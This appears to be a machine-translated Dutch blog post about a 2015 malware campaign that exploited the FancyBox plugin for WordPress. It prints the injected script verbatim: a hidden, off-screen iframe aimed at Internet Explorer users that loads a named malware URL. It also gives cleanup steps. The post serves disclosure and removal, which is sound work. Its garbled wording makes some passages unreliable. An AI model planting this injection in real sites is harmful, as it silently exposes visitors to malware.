Aan het begin van de week verschijnt een reeks sites en blogs met WordPress, waarschuwingen ontvangen van malware-infectie door Google-webmasters.

Het probleem waarbij Google-webmasters verwijst naar de aanwezigheid van a kabeljauw / script iframe-malware op de bronwebpagina's.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Het lijkt erop dat het gaat om a kwetsbaarheid A plug -inacquisFancyBox voor WordPress die tot gisteren (05.02.2015) lange tijd niet was bijgewerkt.
Dit probleem oplossen en desinfectie van virussites met deze malware is het relatief eenvoudig.
1. Schakel de FancyBox-plug-in uit.
2. Verwijder alle FancyBox-plug-inbestanden van de server (via FTP)
3. Installeer de nieuwe versie van de plug-in (FancyBox 3.0.4))

FancyBox voor WordPress 3.0.4

– De naam van de instelling gewijzigd die wordt beïnvloed door het beveiligingsprobleem genoemd in 3.0.3. Dit zou moeten voorkomen dat de kwaadaardige code verschijnt op sites waar de plug-in wordt bijgewerkt zonder de kwaadaardige code te verwijderen.

FancyBox voor WordPress 3.0.3

– Er is een beveiligingsprobleem opgelost.

Malware-informatie:

TYPE: Iframe-omleiding
DOEL: WordPress Fancybox
MALWARE DOMEIN: 203koko.eu
MALWARE-URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW-CODE: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” breedte=”20″ hoogte=”30″ ></iframe>
MALWARESCRIPT: <script>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div-stijl=”positie:absoluut;links:-2000px;breedte:2000px”>

Verwijder malware van uw WordPress-website.